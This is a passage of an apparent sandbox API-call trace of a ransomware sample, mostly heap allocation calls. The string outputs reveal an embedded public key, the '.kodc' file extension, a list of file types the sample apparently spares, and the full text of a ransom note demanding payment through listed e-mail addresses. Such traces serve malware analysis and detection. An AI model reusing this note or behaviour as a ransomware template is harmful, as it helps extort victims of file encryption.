KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0076.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f928 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x334c660 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33530b0 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3353318 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3353580 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33537e8 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3353a50 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3353cb8 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3353f20 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3354188 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33543f0 [0076.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3354658 [0076.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x816) returned 0x32ca798 [0076.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32ca798, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x33415e0 [0076.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x334c690 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33548c0 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3354b28 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3354d90 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3354ff8 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3355260 [0076.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33554c8 [0076.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3355730 [0076.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3355998 [0076.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3355c00 [0076.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3355fd8 [0076.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0076.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x130) returned 0x32d0ca0 [0076.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0076.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1d0) returned 0x32cc4b8 [0076.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0ca0 | out: hHeap=0x630000) returned 1 [0076.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2b7) returned 0x32cbb80 [0076.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc4b8 | out: hHeap=0x630000) returned 1 [0076.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x412) returned 0x32d29c0 [0076.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cbb80 | out: hHeap=0x630000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61a) returned 0x3341e08 [0076.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d29c0 | out: hHeap=0x630000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x32cbb80 [0076.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1056) returned 0x3359fc0 [0076.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32cbb80, cbMultiByte=-1, lpWideCharStr=0x3359fc0, cchWideChar=2091 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned 1068 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1060) returned 0x335b020 [0076.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3359fc0 | out: hHeap=0x630000) returned 1 [0076.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cbb80 | out: hHeap=0x630000) returned 1 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x334c6c0 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3356240 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33564a8 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3356710 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3356978 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3356be0 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3356e48 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33570b0 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3357318 [0076.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3357580 [0076.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33577e8 [0076.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80a) returned 0x32ca798 [0076.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32ca798, cchWideChar=1029 | out: lpWideCharStr=".kodc") returned 6 [0076.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335c088 [0076.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0076.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x32d79d0 [0076.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316e98 [0076.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2e0 | out: hHeap=0x630000) returned 1 [0076.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x710e90 [0076.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x48) returned 0x32f5c88 [0076.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316e98 | out: hHeap=0x630000) returned 1 [0076.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f8c0 [0076.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f858 [0076.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f5c88 | out: hHeap=0x630000) returned 1 [0076.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6090 [0076.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0076.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x630000) returned 1 [0076.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0076.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33184a8 [0076.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd8) returned 0x71ba30 [0076.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0076.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f720 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x32d7a70 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x138) returned 0x32d0ca0 [0076.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x71ba30 | out: hHeap=0x630000) returned 1 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f858 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f768 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c8) returned 0x32cc4b8 [0076.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0ca0 | out: hHeap=0x630000) returned 1 [0076.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f7b0 [0076.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d19a8 | out: hHeap=0x630000) returned 1 [0076.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d79d0 | out: hHeap=0x630000) returned 1 [0076.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x710e90 | out: hHeap=0x630000) returned 1 [0076.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f8c0 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6090 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33184a8 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f720 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d7a70 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f768 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318298 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f7b0 | out: hHeap=0x630000) returned 1 [0076.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc4b8 | out: hHeap=0x630000) returned 1 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x334c6f0 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3357a50 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3357cb8 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3357f20 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3358188 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33583f0 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3358658 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33588c0 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3358b28 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3358d90 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3358ff8 [0076.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0076.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x130) returned 0x32d0ca0 [0076.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0076.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1d0) returned 0x32cc4b8 [0076.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0ca0 | out: hHeap=0x630000) returned 1 [0076.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2b7) returned 0x32cbb80 [0076.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc4b8 | out: hHeap=0x630000) returned 1 [0076.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x412) returned 0x335c8a0 [0076.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cbb80 | out: hHeap=0x630000) returned 1 [0076.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61a) returned 0x32ca798 [0076.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335c8a0 | out: hHeap=0x630000) returned 1 [0076.720] GetUserNameW (in: lpBuffer=0x18e0c0, pcbBuffer=0x18df34 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18df34) returned 1 [0076.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x590) returned 0x335c8a0 [0076.724] GetLastError () returned 0x0 [0076.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81e) returned 0x335c8a0 [0076.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x335c8a0, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x335d0c8 [0076.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335c8a0 | out: hHeap=0x630000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2e0 | out: hHeap=0x630000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e50 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e50 | out: hHeap=0x630000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81e) returned 0x335c8a0 [0076.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x335c8a0, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0076.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x335d8f0 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335c8a0 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x48) returned 0x32f5c88 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x814) returned 0x32d1960 [0076.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x335c8a0 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f858 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f5c88 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335e118 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x630000) returned 1 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335e930 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335f148 [0076.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd8) returned 0x71ba30 [0076.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335f960 [0076.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3360178 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3360990 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x138) returned 0x32d0ca0 [0076.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x71ba30 | out: hHeap=0x630000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x808) returned 0x32d1960 [0076.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x33611a8 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x818) returned 0x32d1960 [0076.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x33619c0 [0076.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.740] RtlAllocateHeap 